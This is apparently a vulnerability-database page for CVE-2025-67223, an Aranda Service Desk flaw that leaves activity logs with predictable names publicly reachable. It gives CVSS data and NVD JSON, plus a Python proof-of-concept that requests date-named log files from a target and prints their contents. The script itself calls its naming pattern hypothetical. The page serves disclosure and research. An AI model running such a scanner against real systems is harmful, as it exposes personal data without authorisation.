Security Vulnerability Report
中文
CVE-2025-67223 CVSS 7.5 HIGH

CVE-2025-67223

Published: 2026-04-28 15:16:06
Last Modified: 2026-04-28 20:18:13
Source: [email protected]

Description

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtual paths of uploaded files and bypass access controls to download sensitive documents containing PII.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Aranda Software Aranda Service Desk < 8.3.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests from datetime import datetime, timedelta def check_vulnerability(target_base_url): """ Expit: CVE-2025-67223 Description: Checks for predictable log files in AFS component. """ print(f"[*] Scanning target: {target_base_url}") # Common path for logs based on vulnerability description log_path = "/afs/logs/" # Check for logs in the last 7 days for i in range(7): date_obj = datetime.now() - timedelta(days=i) # Hypothetical predictable naming convention: activity_YYYY-MM-DD.log log_filename = f"activity_{date_obj.strftime('%Y-%m-%d')}.log" full_url = f"{target_base_url}{log_path}{log_filename}" try: response = requests.get(full_url, timeout=5) if response.status_code == 200: print(f"[!] Vulnerability confirmed! Log file accessible: {full_url}") print(f"[*] Log content preview:\n{response.text[:300]}") return True except requests.RequestException as e: pass print("[-] Could not find accessible log files with standard naming patterns.") return False if __name__ == "__main__": # Replace with the actual target URL target = "http://127.0.0.1" check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67223", "sourceIdentifier": "[email protected]", "published": "2026-04-28T15:16:06.033", "lastModified": "2026-04-28T20:18:13.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtual paths of uploaded files and bypass access controls to download sensitive documents containing PII."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}, {"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://arandasoft.com/en/productos/aranda-service-management/", "source": "[email protected]"}, {"url": "https://docs.arandasoft.com/at-v8-release-notes/en/pages/release_pdf/file_server.html", "source": "[email protected]"}, {"url": "https://github.com/brandonperezlara/CVE-2025-67223", "source": "[email protected]"}, {"url": "https://github.com/brandonperezlara/CVE-2025-67223", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.